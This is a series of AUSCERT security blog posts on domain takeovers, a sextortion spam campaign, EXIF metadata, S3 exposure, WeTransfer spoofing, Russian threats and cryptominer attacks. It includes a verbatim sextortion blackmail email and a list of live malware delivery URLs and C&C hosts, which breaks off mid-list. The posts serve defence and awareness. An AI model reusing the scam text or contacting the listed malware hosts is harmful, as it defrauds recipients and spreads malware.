What Scotty Didn't Know – your guide to domain takeovers Last night, a domain belonging to our PM lapsed, resulting in a cheeky citizen snapping it up [1]. If your business lost control of its domain, what would you do? Losing your domain can greatly impact business operations – email will stop working, customers won’t be able to access your website, soon calls and tweets start coming in. In a worst case scenario, someone with malicious intent can claim the domain, start receiving sensitive business emails, receive password reset emails for online services, and start sending emails as you. Not only does this look unprofessional, but can significantly impact service to your clients, your access to other services (via email password resets), and impact business revenue. Fortunately, prevention is as simple as not letting the renewal get lost in a sea of tasks: – See if your registrar allows automatic renewal, and make sure your payment details are kept up to date– Set an alert far enough in advance to get the expense approved and paid– Don’t ignore emails from your registrar, but also don’t click links in the email. It is always safer to go directly to their website– Related to the previous point, watch out for scam emails claiming to be from a registrar. They often use urgent wording to try get you to click ICANN is the Internet Corporation for Assigned Names and Numbers. They control generic top level domains (gTLD) such as .com, .net, .space. The number of gTLDs is expanding, but there are currently over 1900 that have been delegated. ICANN policy allows a 30 day redemption grace period where the registered name holder can renew a lapsed gTLD. The .au TLD is a country code top level domain (ccTLD). In Australia, the .au top level domain, which includes .com.au, .gov.au, .net.au, .edu.au, is controlled by auDA – .au Domain Administration Ltd [2]. auDA’s domain name renewal policy for lapsed domains is also 30 calendar days after expiry. Conveniently, for potential scammers, there is a public list of expired domain names, updated daily. [3] If someone has taken your .au domain and is trying to sell it back to you, this is called cybersquatting, and not allowed according to auDA’s policies:“A registrant may not register a domain name for the sole purpose of resale or transfer to another entity.” [4]In this scenario, you would be able to file a complaint with auDA.   Registering similar domains So you have awesomebusiness.com.au … but what if someone buys awesomebusiness.com? Or awesomebusiness.tk? Domains are fairly cheap, so it often doesn’t hurt to buy the more common ones, like .com or .net If you follow this route, try not to let them lapse as well! If someone does register a domain that infringes on your trademark, it may be possible to have it de-registered. We recommend speaking with your legal department for advice. AUSCERT is only able to issue takedowns for malicious domains that are used to distribute malware or phishing campaigns. Subdomain takeoversIt would be remiss to have a post about domains but not mention subdomain takeovers. This often occurs when CNAME records aren’t kept up to date. For example, say you have campaign.awesomebusiness.com.au which points to hosting.cloud.com. After the campaign ends you take down the site, but forget remove the CNAME record. This would allow someone else to establish a service on hosting.cloud.com, and set up a phishing site for your users at campaign.awesomebusiness.com.au. To prevent this, include updating DNS in your decommissioning process, and periodically check your DNS zone file. While domain threats are not often at the forefront of our minds, a little bit of housekeeping can go a long way to prevent an embarrassing incident in the future. Charelle. [1] https://web.archive.org/web/20181018222134/http://www.scottmorrison.com.au/[2] https://www.auda.org.au/[3] https://afilias.com.au/about-au/domain-drop-lists[4] https://www.auda.org.au/policies/index-of-published-policies/2012/2012-04/

Targeted blackmail campaign gains momentum Since the dawn of email, spam has constantly pushed our ability to handle arbitrary, unsolicited input. Whether through gauntlets of long-forgotten regexes, or the most sophisticated of convolutional neural nets, detecting and blocking spam has been a Sisyphean battle which has consumed countless IT resources. Not so at AUSCERT. We have the dubious luxury of actively soliciting spam wherever it is to be found. Because of this we’re able to watch as campaigns wax and wane, see how they evolve over time, and get a feel for the objectives of the spammers. Some campaigns are evergreen – fake pharmaceuticals (usually of the male enhancement variety), various advance-fee scams (think Nigerian Prince), phishing for credentials – it’s rare a day goes by without examples of these coming across our inbox. Some campaigns are very flavour-of-the-month, for a few months everyone had their own ICO or crypto investment strategy to hawk to any mail socket willing to listen(). Other campaigns are more sporadic. It’s not unusual for us to see a short burst of activity on one particular topic or script which goes silent, only to re-emerge later. Sometimes this is to facilitate a transition to new infrastructure, or to replenish their supply of compromised accounts. Other times this can be to spend time reworking the script, or refining their technique – this blog deals with one such instance where the renewed campaign was so successful that we’ve seen a large uptick in its output. This particular campaign is a faux sextortion blackmail. The premise of the blackmail is that the spammer has recorded the recipient visiting a pornographic website, through some vulnerability on the website or the recipient’s own computer. Unless the victim pays a sum of cryptocurrency to the spammer, they threaten to release this non-existent video to the victim’s family, friends, or colleagues. The campaign itself is far from new, we have seen minor variations on the same script pop up repeatedly. Recently a new variation emerged, almost exactly the same, but with one small difference: it would present the recipient’s password to them. Given that these passwords were usually out of date, and data breaches and dumps are a great source of email address for spam campaigns, it stands to reason that the spammers were simply pulling passwords for a given email from old breaches and inserting them into the email template. In fact, in our case it would seem if they cannot find a matching password then it fills that portion of the template in with an empty string. We’re certainly not the first to have written about this campaign,[1] but we were spurred to write this post due to the increase in its prevalence that we’re witnessing. Unfortunately this only means one thing: it’s working. We’re also now seeing campaigns where the recipient’s name and phone number are being used in place of the password. It’s not hard to see how as an unsuspecting recipient you could easily be fooled into believing the claims made. Indeed, efforts to catalogue and track the transactions of the various wallet addresses used by the spammers prove that it’s having the desired effect.[2] Some things you can do to protect yourself against such scams: Treat all unsolicited email with a healthy dose of skepticism. If you receive any threatening email, take a sentence or two and search for them. This can help you detect if you’ve received a well-known script or variant. Report the email to your IT department if possible. Practice good password hygiene. If you know you’ve used a strong, unique password for each service then you reduce your exposure when one is breached. Consider a password manager. For reference, here is an example from this campaign that we have received: It appears that, (), is your password. May very well not know me and you are probably wondering why you're getting this e-mail, right? actually, I put in place a malware over the adult videos (adult porn) website and guess what happens, you visited this web site to have fun (you really know what What i'm saying is). When you were watching videos, your internet browser started off working like a RDP (Remote Desktop) which provided me accessibility to your screen and web camera. from then on, my software program obtained your complete contacts from your Messenger, Microsoft outlook, Facebook, as well as emails. What did I really do? I created a double-screen video clip. First part shows the recording you were seeing (you have a good taste haha . . .), and 2nd part shows the recording of your webcam. what exactly should you do? Well, in my opinion, $1200 is a fair price for your little secret. You will make the payment by Bitcoin (if you do not know this, search "how to buy bitcoin" in Google). Bitcoin Address: **ADDRESS** (It is case sensitive, so copy and paste it) Very important: You've got some days to make the payment. (I have a unique pixel in this e-mail, and at this moment I know that you've read through this email message). If I do not get the BitCoins, I will certainly send your videos to all of your contacts including relatives, co-workers, and so forth. Having said that, if I receive the payment, I'll destroy the recording immidiately. If you'd like evidence, reply with "Yes!" and I will definitely mail out your videos to your 6 contacts. It is a non-negotiable offer, that being said don't waste my personal time and yours by answering this message. [1] https://krebsonsecurity.com/2018/07/sextortion-scam-uses-recipients-hacked-passwords/[2] https://twitter.com/SecGuru_OTX/status/1022430328647024640

Location, location, location This week we received an email from a person who was concerned about a picture they had uploaded to their profile within an organisation.  They noticed that the GPS coordinates of where the photo was taken was retained in the metadata of the uploaded image.  Curious, they started looking at other people’s profile images to discover coordinates stored in those as well, potentially revealing where these colleagues live. What is EXIF data? Apart from the image itself, an image file can store other information such as date, time, camera information and settings, geolocation, and copyright information. For a photographer, this information is very useful, and saves having to write it down for each photo.  What it also means though, is that when we take a photo with a camera phone, and upload this image to social media, that site now has access to where you are, and at what time you were there.  Not only that, but if the website doesn’t strip the metadata before republishing, others could also see this information and track your location and movements. What can I do? For users: Many social media websites already strip location and other EXIF data, including (at the time of writing) Facebook, Instagram, LinkedIn and Twitter. That said, many other large sites do not strip this metadata, and it can be difficult to know about smaller services or corporate systems, so as a user, it is safer to disable the saving of location information from your device. On Android, this will vary depending on your phone and version. In your camera application, look for ‘Settings‘, then ‘GPS location‘ or ‘Store Location‘, and turn this option off. You can also disable location services completely by going to ‘Settings‘, then under the ‘Personal‘ heading, select ‘Location‘ and turn it off. On an iPhone, in ‘Settings‘ go to ‘Privacy‘, then ‘Location Services‘ and turn this option off for the camera. These steps only disable location information. Time and date stamps, as well as device information will still be retained. For existing photos on your computer, you can use Imagemagick (https://www.imagemagick.org, cross platform) to batch strip EXIF data from your images: $ mogrify -strip * In Windows, you can right click an image, select ‘Properties‘, then the ‘Details‘ tab to see and remove the image’s metadata. Alternatively, there are many other image editing tools to choose from.   For administrators: Please look into stripping metadata when a user uploads an image to your web application, or re-process images so that data isn’t available to other users. Happy (and safe) snapping!Charelle.

Insecure AWS S3 buckets – an ongoing target Recently, AUSCERT has seen an increase in the number of attacks on unsecured cloud infrastructure. One of the most frequently targeted cloud hosting methods is Amazon’s Scalable Storage Solution, commonly referred to as AWS S3.   S3 is used to store static assets for public websites, such as images and javascript, and is also used as a destination for backup solutions, due to its low storage costs. S3 buckets can be accessed via HTTP/HTTPS, as well as an API that is available to other AWS infrastructure.    However, critically, many buckets have been configured to expose all of their files, as well as a listing of the files in the bucket – a modern equivalent to the open directory listing issue that many misconfigured webservers have suffered from in the past.   Perhaps due to an overload of new practices required when switching to AWS infrastructure, or due to unfamiliarity with the platform, many S3 buckets have been left exposed when they contain sensitive or secret data, such as backups, copies of databases, or private documents. Many of these S3 buckets have been discovered by third parties, which has resulted in some high-profile data breaches. This website maintains a listing of data breaches that were caused by insecure S3 buckets.   Although this issue has been known for a long time, in the last 12 months more tools to enumerate, discover, and even provide public search listings of S3 buckets have become available. This recent trend has prompted AUSCERT to begin scanning AWS for S3 buckets that have easily guessable names relating to our members’ organisations.   Amazon themselves have noted this issue and have taken measures to assist users and prevent further compromises on their platform. Last year, after a large breach that affected millions of Dow Jones customers, Amazon sent an email to the account administrator of every AWS account that had publicly accessible S3 buckets.   In Amazon’s own words, “While there are reasons to configure buckets with world read access, including public websites or publicly downloadable content, recently, there have been public disclosures by third parties of S3 bucket contents that were inadvertently configured to allow world read access but were not intended to be publicly available. We encourage you to promptly review your S3 buckets and their contents to ensure that you are not inadvertently making objects available to users that you don’t intend.”   The official AWS blog contains useful information about securing S3 buckets while still allowing access in a controlled manner. See this article, published in March 2018, for more details.   AUSCERT recommends reviewing all of your AWS infrastructure to ensure access controls are appropriate for your uses.     Anthony Vaccaro, Senior Information Security Analyst at AUSCERT

Malicious emails via WeTransfer AUSCERT has seen direct evidence of malicious emails being sent via WeTransfer, as part of an ongoing campaign affecting Australian organisations. We have summarised our findings and provided advice, which can be found at the end of this post. WeTransfer is a legitimate file-hosting service with a simple business model: users can upload a file, enter a recipient email address, and enter a sender email address. The uploaded file will be sent to the recipient with an explanatory email template, and the sender will also receive an email receipt. However, WeTransfer perform minimal validation on email addresses provided by users, which is a major security hole. By default, users may enter any sender address. The WeTransfer FAQ makes it clear that they allow address spoofing on purpose: “Our ease of use is a core value, that’s why we allow our users to enter any email address they want. This sometimes has the effect you are experiencing, where someone else uses your email address. Most likely even by mistake!” An attacker can enter something like the following: This will send a legitimate-looking file transfer email to both parties, using WeTransfer’s branding and legitimate email headers.     This means that WeTransfer is allowing targeted phishing and malspam emails to be delivered, based on the strength of their own brand. This vulnerability, and others, have been known for months.    When AUSCERT contacted WeTransfer to report this security hole, we received a response, the gist of which was: They’ve blocked the sender and their IP address. They’ve removed the malicious file, so nobody can download it. They consider this kind of abuse a “very rare effect”. They have a “new email verification feature”. Fill out a form and they’ll send a verification token to your email address every time it is used as a sender. They can block a specific email address so it cannot be used to send spam.   This is inadequate, for the following reasons: Verification of the sender should be default, not opt-in. IP address blacklists provide minimal security. It is not the responsibility of an organisation or individual to disallow third-party services from spoofing them.   AUSCERT recommends: All emails sent from WeTransfer should be treated as suspicious. Until mail blacklists begin to block WeTransfer’s emails automatically, flag suspicious emails as junk. Mail administrators should consider looking for recent WeTransfer emails and following up with users. Malicious emails are sent from noreply@wetransfer.com.

Russia, diplomacy and potential repercussions in Australian cyberspace Background We recently witnessed the “largest expulsion of Russian diplomats” by 27-odd countries in support of the UK, following the attempted murder of a Russian double agent on British soil. Russia in turn directed threats of retaliatory action to the countries involved, including Australia. Australia has signalled intent to boycott the World Cup, which will be held in Russia this year. With the Gold Coast Commonwealth Games on right now, that may be just be sufficient cause for Russian “cyber activists” to direct some nasty traffic our way.   Russia’s track record of using cyber attacks in support of its political agenda [1] 2007, Estonia. Large scale DDoS attack.            Triggered by planned relocation of a Russian World War 2 memorial. 2008, Lithuania. Government site defacements.            Triggered by the Lithuanian government banning display of Soviet symbols. 2008, Georgia. Internal communications shutdown.            Triggered by Georgia sending troops to reclaim a breakaway republic supported by Russia. This was followed by a Russian military invasion. 2009, Kygyzstan. DDoS against two ISPs.            Triggered by the need to exert pressure on the government to evict a US military base. It worked! 2009, Kazhakstan. DDoS on media outlet.            Triggered by release of an article that was critical of Russia. 2009, Georgia. DoS of Twitter and Facebook in Georgia.            Triggered by the first anniversary of the invasion of  Georgia! 2014, Ukraine. DoS on Ukrainian election commission.            Triggered by attempts to create chaos in support of the pro-Russian candidate. 2015, Germany. Compromise of German Bundestag.            Triggered by an attempt to retrieve information on German and NATO leaders. 2015, Holland – Pull out reports on MH17 investigation. 2015, USA. Compromise of Democratic Party computers.            Triggered by attempts to undermine elections. 2016, Finland. Compromise of Finnish foreign ministry computers. 2016, Germany. Emerging claims of malicious activity being conducted by Russian hackers to discredit incumbent chancellor, Angela Merkel.   Increasing confidence The above sequence indicates an increasingly confident nation state, reaching further and deeper into foreign spheres to satisfy its political agenda. One common thread in all the above attacks is an attempt to highlight weaknesses in the targeted country’s government and/or commercial infrastructure. Even stealthy attacks, once exposed to the media, serve to question the security posture of the victim nation.  While the above list contains all the acts attributed to Russia, other nation states, such as North Korea have also been attributed with malicious acts against other nations. Perhaps most significant in the context of the Commonwealth Games is the “Olympic Destroyer” [2] malware that was deployed against South Korea during the Pyeongchang winter Olympics. This malware was capable of permanently damaging computer systems employed in the games.   What does this mean for us? Possibly a two prong approach: Noisy hacktivist type attacks Government website defacements (e.g. foreign ministry) Commonwealth games site defacement Denial of Service attacks against Commonwealth Games infrastructure (similar to Olympic Destroyer) Stealthy attacks Advanced Persistent Threats (APTs) to obtain sensitive data from Government and commercial entities Harvesting Commonwealth Games visitor information (which the Gold Coast City Council admitted doing, by collecting user’s Facebook accounts when they connect to the high-speed public Wi-Fi network) How can we protect ourselves? Tune preventive controls to indicators of exploit traffic, DDoS traffic, and APTs. Have a DDoS response plan. [3] Watch for acts of cyber-aggression against countries threatened with retaliation as a potential indicator of elevated threats again Australia Don’t use unprotected public Wi-Fi networks (or “protected” public Wi-Fi networks). If you absolutely must, use encrypted chat channels and mail clients for communication. Elevated monitoring of Industrial Control System processes and infrastructure for anomalous behaviour. Read Security bulletins for the latest vulnerabilities affecting devices and software in your environment that might be exploited, and take necessary measures to patch them based on a risk-based prioritisation schedule   References https://www.nbcnews.com/storyline/hacking-in-america/timeline-ten-years-russian-cyber-attacks-other-nations-n697111 http://blog.talosintelligence.com/2018/02/olympic-destroyer.html https://zeltser.com/ddos-incident-cheat-sheet/  

25 Years of AUSCERT AUSCERT celebrates 25 years today There has been a lot of growth in the industry since the original SERT (Security Emergency Response Team) was formed in 1993. Three Brisbane based universities formed the SERT originally, Queensland University of Technology, Griffith University and The University of Queensland. Originally the SERT was formed for several reasons. One was in response to Australia being recognised as a targeted geographical location for cyber security threats. Also, back in 1992, Australia was the origin of an increasing number of these attacks, which targeted overseas websites. Relationship building with international CERTs began at this time, with the CERT Coordination Centre in Pittsburgh and the DFNCERT team in Germany being incredibly vital to the growth of Australia’s first CERT. In the early days an exercise book was used to log all incoming calls, including wrong numbers. Indeed one of those original staff members, whose initials are inscribed in that book, is an AUSCERT employee today. AUSCERT began in name on the 1st April, 1994, this was made possible by a collaboration with AARNet, who at that time were quite new themselves, only having been in operation for several years. AUSCERT became a member organisation in the late nineties, and has since been funded by our members.   The AUSCERT team is driven by a passion to protect, assist and engage with the information security community. We will continue to provide first class threat intelligence, unique membership options and advice now, and in the future.  

Mandatory Data Breach Notification Scheme MANDATORY DATA BREACH NOTIFICATION SCHEME How it affects you   Introduction It’s official! The Notifiable Data Breaches scheme, established by the Privacy Amendment (Notifiable Data Breaches) Act 2017, will be officially enforced from the 22nd of February 2018.   What is it? It is a legal obligation to notify individuals whose personal information is involved in a data breach that is likely to result in serious harm.   Does my organisation need to comply? When do I need to report a data breach and how?        IF your organisation is described in “Entities covered by the NDB scheme”        AND        2. Your organisation collects, retains, handles and transmits ‘personal information’        AND        3. Your organisation has been subjected to an eligible data breach [4], and there are no applicable exceptions to notification obligations       THEN You need to complete assessing the suspected data breach within 30 calendar days of becoming aware of the suspected breach. A suggested three-step assessment procedure contains the following stages:        a. Initiate: decide whether an assessment is necessary and identify which person or group will be responsible for completing it        b. Investigate: quickly gather relevant information about the suspected breach including, for example, what personal information is affected, who may have had access to the information and the likely impacts, and        c. Evaluate: make a decision, based on the investigation, about whether the identified breach is an eligible data breach (see Identifying eligible data breaches).        IF           reasonable evidence exists to believe an eligible data breach has occurred,        THEN You need to notify: a. Affected individuals b. The Australian Information Commissioner, by submitting a Notifiable Data Breach statement – Form available at https://www.oaic.gov.au/NDBform/.       2. The following information must be included in an eligible data breach statement:           a. the identity and contact details of the organisation           b. a description of the data breach           c. the kinds of information concerned and;           d. recommendations about the steps individuals should take in response to the data breach.      3. Special conditions for notification exist where the breached data is in the custody of more than one party.    An excellent resource covering this topic is available here.   Additional Resources https://www.youtube.com/watch?v=BZXzNLlW2vA   Legal AUSCERT has made every effort to ensure that the information contained on this web site is accurate. However, the decision to use or follow any information or advice referenced here is the responsibility of each user or organisation. The appropriateness of any information or advice for an organisation or individual system should be considered before application in conjunction with the organisation’s local policies and procedures. AUSCERT takes no responsibility for the consequences of applying or following the information or advice on this web site.

AUSCERT at linux.conf.au 2018 Hi, I’m David, one of the information security analysts here.   Intro AUSCERT sent me to the 2018 linux.conf.au conference with a Fairy Penguin sponsorship. It was my second time attending; the previous year, I’d taken a week’s leave and paid my own way, and was so enamoured that I convinced my new employer to send me along this time. The real strength of the conference, to me, is being surrounded by people much smarter and more experienced than myself. (This is exactly how I pitched it to management.) And the atmosphere is so friendly that knowledge transfers quickly. The organisers put a strong emphasis on inclusion and diversity. One of these is the “Pac-Man rule”: when standing in a circle talking, shape it like Pac-Man and leave space for someone else to join. Speaking of speaking, the #lca2018 hashtag was pretty hectic all week. The Australia/NZ FOSS community is great to be involved with, and I’ve found it pays to follow interesting people using the tag. I also find it’s valuable to connect with people for whom information security is part of their job, but not their core responsibility. Understanding the motivations and needs of people outside the infosec space is important to staying in the loop. Plus, they have some really cool projects.   Recordings to watch All the talks are recorded and published free on YouTube by Next Day Video. I’m enjoying “week two” of the conference – catching up on the talks I couldn’t attend! We’ll also replay some talks at the office over lunch. At AUSCERT, we mix infosec with data analysis, technical communication and lightweight development. Current proposals are Understanding git – even the scary parts, What is the most common street name in Australia?, Is the 370 the worst bus route in Sydney? and the Panel on Meltdown, Spectre and the free-software community. Talks I personally recommend are every single keynote, the Meltdown/Spectre Panel, a home Kubernetes environment, automating WordPress security recovery, Tap On to Reverse Engineering, and Linux system monitoring with the Elastic Stack. Shoutout to Alistair Chapman for his superb lightning talk on things you can do but shouldn’t with Docker.   Notes from the Spectre/Meltdown Panel The speculative execution side-channel vulnerabilities had been leaked three weeks before the conference, so a panel was organised (and jammed into the schedule). It was a fascinating session giving perspectives from several stakeholders at several levels of the stack – hardware, kernel, OS, container, SRE and more kernel. Some interesting stories about responses to the embargo and patches from different parties. FreeBSD weren’t included in the embargo and were left scrambling to patch when it leaked. Small PaaS providers are stuck waiting for patches for their OS. Hardware vulnerabilities are very hard to resist even with containerised services. … but containers will make it easier when you patch. Some discussion of the value of embargoes of vulnerabilities. Give the full session a watch; it’s rare to find so much diverse expertise in one room, talking semi-frankly about this.   Wrapping up The linux.conf.au conference is a very educational week for anyone IT-adjacent, and I’d strongly recommend it. Hope to see you at #lca2019 in Christchurch! David Lord, @dal_geek

Attackers using remote coding execution vulnerabilities to install cryptocurrency miners in vulnerable hosts Introduction Kicking off the New year, AUSCERT received reports of multiple attacks attempting to run exploits against vulnerable hosts in order to install and operate Cryptocurrency miners in them. Similar attacks have been reported around the globe. Sighted attacks so far have targeted hosts running Linux operating systems. The miners are dropped as ELF 64-bit files; these are Monero miners to be precise, and are variants of XMRig. [1] Alienvault released a pulse addressing Monero Miner installation attacks. [2] In one attack scenario, attackers exploited a Remote Code execution vulnerability in the WLS Security sub-component of the Oracle WebLogic Server (WLS) (CVE-2017-10271), to download and install Monero miner software in the target host. Weblogic Server versions vulnerable to this attack are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This vulnerability was addressed in Oracle CPU [3].  Two articles from nsfocusglobal and morihi-soc (translation required) provide some analyses into these attacks. [4,5]. AUSCERT performed its own analysis based on reports from multiple members. Indicators derived from that investigation have also been included in the list of indicators provided at the end of this blog. A new python-based cryptominer botnet has also been recently exposed. It uses a JBOSS vulnerability (CVE-2017-12149) to run remote code exploits against vulnerable Linux hosts to fetch base64 encoded python scripts and execute them.  These scripts in turn connect to remote Command and Control servers to fetch additional python scripts. Interestingly, this botnet appears to be using pastebin resources as C&C servers. [6]   Basic characteristics of an attack 1. Attackers launch a remote code execution exploit targeting one of the following vulnerabilities in the target host:     a. WebLogic server Remote Code Execution vulnerability. (CVE-2017-10271)    b. JBoss Remote Code Execution vulnerability (CVE-2017-7504, CVE-2017-12149: used by a new python-based crypto miner)    c. Apache Struts Jakarta Multipart parser Remote Code Execution vulnerability (CVE-2017-5638) 2. The exploit request includes the payload to fetch the cryptominer from a remote url create a crontab entry to make it run persistently and execute via the local shell depending on the operating system (e.g. cmd.exe for Windows and /bin/bash/ for Linux systems). 3. Additional Shell scripts are fetched from remote servers. These scripts have the function of:     a. Killing competing processes that consume large CPU loads (>20%)    b. Kill competing xmrig cryptocurrency mining processes    c. Create crontab entries and/or rc.local files to ensure the miner is executed at regular intervals or on system reboot    d. Modify file permissions to allow the miner to be executed by users with any privilege level    e. Generate log files     f. Communicate the miner’s execution progress to a remote HQ.    g. Determine the CPU type and number of CPU cores in a host and then branching to fetch an appropriate miner. 4.  The miner regularly communicates execution progress to a remote mining pool (or hq). Actual miner files carry different names based on the attack. AUSCERT has currently sighted miners as 64-bit ELF files with the following names:    a. fs-manager    b. sourplum    c. kworker    d. kworker_na Factors differentiating miners 1. Maximum CPU threshold.2. Dependence on an external config file. Some miner require an external config file (example, kworker.conf or config.json) to execute correctly. The config file typically contains:    a. The username and password to access the remote mining pool     b. URL of the remote mining pool    c. Mining algorithm used (e.g. Cryptonight)     d. the “nice” level of the mining process3. Homing to different HQs or mining pools Mitigation Recommendations 1. Patch systems against commonly targeted vulnerabilities for this type of attack. 2. Set ACLs and Firewalls to block outbound and inbound access to and from known Bitcoin mining pool IPs (unless your organisational policy allows the use of computing resources for bitcoin mining!). 3. Set IDS/IPS to detect requests and responses to and from payload delivery and network activity URLs. 4. Block resolution of domains known to be C&C and mining pools for cryptocurrency miners (e.g. via DNS firewalls). 5. Check Host files systems for dropped files (representing crypto miners) and corresponding hashes (e.g. using a Host-based IDS like OSSEC). See Indicators section below for a list of indicators of compromise. References 1. https://github.com/xmrig/xmrig 2. https://otx.alienvault.com/pulse/5a4e1c4993199b299f90a212/?utm_medium=InProduct&utm_source=OTX&utm_content=Email&utm_campaign=new_pulse_from_subscribed 3. http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html. 4. https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/ 5. http://www.morihi-soc.net/?p=910 6. https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar   Indicators Network-based indicators Payload delivery url http://27.148.157.89:8899/1.exe Monero miner delivery url Payload delivery url http://221.229.204.177:8888 Monero miner delivery url Payload delivery url http://27.148.157.89:8899/xmrig Monero miner delivery url Payload delivery url http://72.11.140.178/?info=l30 Monero miner delivery url Payload delivery url http://72.11.140.178/files/ Monero miner delivery url Payload delivery url http://72.11.140.178/?info=l69 Monero miner delivery url Payload delivery url http://72.11.140.178/files/w/default Monero miner delivery url Payload delivery url http://27.148.157.89:8899/xmr64.exe Monero miner delivery url Payload delivery url http://72.11.140.178/?info=w0 Monero miner delivery url Payload delivery url http://27.148.157.89:8899/1.sh Monero miner delivery url Payload delivery url http://72.11.140.178/files/w/default/auto-upgrade.exe Monero miner delivery url Payload delivery url http://72.11.140.178/files/w/default?info=w0 Monero miner delivery url Payload delivery url http://www.luoxkexp.com:8520/php.exe Monero miner delivery url Payload delivery url http://72.11.140.178/auto-upgrade Monero miner delivery url Payload delivery url http://luoxkexp.com:8888/samba.exe Monero miner delivery url Payload delivery url http://27.148.157.89:8899/xmr86.exe Monero miner delivery url Payload delivery url http://27.148.157.89:8899/fuckpig.jar Monero miner delivery url Payload delivery url http://www.luoxkexp.com:8520/ Monero miner delivery url Payload delivery url http://72.11.140.178/?info=w9 Monero miner delivery url Payload delivery url http://72.11.140.178/files/w/default?info=w9 Monero miner delivery url Payload delivery url http://luoxkexp.com:8888/xmr64.exe Monero miner delivery url Payload delivery url http://luoxkexp.com/xmr64.exe Monero miner delivery url Payload delivery url http://27.148.157.89:8899/112.exe Monero miner delivery url Payload delivery url http://72.11.140.178/files Monero miner delivery url Payload delivery url http://27.148.157.89:8899/jiba Monero miner delivery url Payload delivery url http://luoxkexp.com Monero miner delivery url Payload delivery url http://72.11.140.178/files/w/others Monero miner delivery url Payload delivery url http://72.11.140.178/setup-watch Monero miner delivery url Payload delivery url http://72.11.140.178/wls-wsat/CoordinatorPortType Monero miner delivery url Payload delivery url http://72.11.140.178/?info=l60 Monero miner delivery url Payload delivery url http://72.11.140.178/files/l/default Monero miner delivery url Payload delivery url http://luoxkexp.com:8888/xmr86.exe Monero miner delivery url Payload delivery url http://luoxkexp.com:8899/xmr64.exe Monero miner delivery url Payload delivery url http://72.11.140.178/files/l/others Monero miner delivery url Payload delivery url http://luoxkexp.com:8899/1.exe Monero miner delivery url Payload delivery url http://letoscribe.ru/includes/libraries/files.tar.gz Monero miner delivery url Payload delivery url http://letoscribe.ru/includes/libraries/getsetup.php?p=wl Monero miner setup file delivery url Payload delivery url http://45.77.106.29/selectv2.sh Sourplum and related scripts delivery url Payload delivery url http://45.77.106.29/sourplum Sourplum and related scripts delivery url Payload delivery url http://45.77.106.29/lowerv2.sh Sourplum and related scripts delivery url Payload delivery url http://45.77.106.29/rootv2.sh Shell script delivery url Payload delivery url http://181.214.87.240/res/logo.jpg Shell script delivery url Payload delivery url http://5.188.87.12/langs/kworker_na Monero miner delivery url Payload delivery url http://181.214.87.240/res/kworker.conf Monero miner config file delivery url Network activity url http://letoscribe.ru/includes/libraries/notify.php?p=wl Monero Miner reports execution progress to HQ at this URL Network activity url http://104.223.37.150:8090 Known C&C for python-based crypto miner Network activity url http://pastebin.com/raw/yDnzKz72 Known C&C for python-based crypto miner Network activity url http://k.zsw8.cc:8080 Known C&C for python-based crypto miner Network activity url http://i.zsw8.cc:8080 Known C&C for python-based crypto miner Network activity url http://pastebin.com/raw/rWjyEGDq Known C&C for python-based crypto miner Network activity url http://208.92.90.51 Known C&C for python-based crypto miner Network activity url http://208.92.90.51:443 Known C&C for python-based crypto miner Network activity domain minergate.com Known C&C address pool and Bitcoin mining pool domain Network activity domain minexmr.com Known C&C address pool and Bitcoin mining pool domain Network activity domain letoscribe.ru Known Monero Miner HQ domain Network activity domain pool-proxy.com Mining pool domain Network activity domain fee.xmrig.com Domains contacted by fs-manager Network activity domain nicehash.com Domains contacted by fs-manager Network activity domain data.rel.ro Domains contacted by fs-manager Network activity domain dkuug.dk kworker miner attempts to communicate with this domain Network activity domain i.zsw8.cc C&C Domain for python-based crypto miner Network activity domain k.zsw8.cc C&C Domain for python-based crypto miner Network activity hostname pool.supportxmr.com Known mining pool host Network activity hostname pool.cortins.tk Known mining pool host Network activity ip-dst 104.25.208.15 C&C address pool and Bitcoin mining pool IP Network activity ip-dst 94.130.143.162 C&C address pool and Bitcoin mining pool IP Network activity ip-dst 72.11.140.178 C&C address pool and Bitcoin mining pool IP Network activity ip-dst 88.99.142.163 C&C address pool and Bitcoin mining pool IP Network activity ip-dst 78.46.91.134 C&C address pool and Bitcoin mining pool IP Network activity ip-dst 104.25.209.15 C&C address pool and Bitcoin mining pool IP Network activity ip-dst 136.243.102.154 C&C address pool and Bitcoin mining pool IP Network activity ip-dst 136.243.102.167 C&C address pool and Bitcoin mining pool IP Network activity ip-dst 148.251.133.246 Mining pool (HQ) IP Network activity ip-dst 104.223.37.150 C&C IP Network activity ip-dst 208.92.90.51 C&C IP Payload delivery ip-src 45.77.106.29 Payload delivery ip-src 181.214.87.240   Host-based indicators Artifacts dropped sha256 7153ac617df7aa6f911e361b1f0c8188ca5c142c6aaa8faa2a59b55e0b823c1c Ref: XMRig variant fs-manager Artifacts dropped sha256 9359f7e7b1dd0f4ce4a2c52fe611c981a3dd7a17f935862e3ce9acb5f2df8ced Ref: kworker Artifacts dropped sha256 f4864b3793c93de50b953e9751dc22e03fa0333ae6856d8d153be9018da6d911 Ref: kworker_na Artifacts dropped sha256 d47d2aa3c640e1563ba294a140ab3ccd22f987d5c5794c223ca8557b68c25e0d Python-based crypto miner Artifacts dropped sha256 bcf306bf3c905567ac1a5012be94fe642cac6116192cea6486730341b32b38a4 Artifacts dropped sha256 0c5e960ca2a37cf383a7457bcc82e66d5b94164b12dfca1f21501211d9aca3c9 Artifacts dropped sha256 b3aba7582de82a0229b4d4caf73bc50cc18eb98109a0e251447dfb47afabc597 Payload delivery md5 0dc34402be603f563bfb25e7c476a0b4 Payload delivery md5 6455ffef458df6d24dd4df37f3d6df73 Payload delivery md5 9eadc40299864089e8a0959d04b02b39 Payload delivery md5 e1df71c38cea61397e713d6e580e9051 Payload delivery sha1 deeb65dbf4ac5d1d0db6ac4467282f62049a3620 Payload delivery sha1 777af085e72a4a19b6971f24c1167989335af508 Payload delivery sha1 4f41da624726daf16e1c0034e8a6a99c790be61e Payload delivery sha1 9be68990dd7b071b192b89b0e384f290cce2b2db Payload delivery sha256 0b2bd245ce62787101bc56b1eeda9f74e0f87b72781c8f50a1eff185a2a98391 Payload delivery sha256 182812097daabfc3fe52dd485bb0a0f566ddf47f23b9d9f72c2df01a1a4faf84 Payload delivery sha256 43f78c1c1b078f29fd5eb75759aa7b1459aa3f1679bbaabc1e67c362620650fb Payload delivery sha256 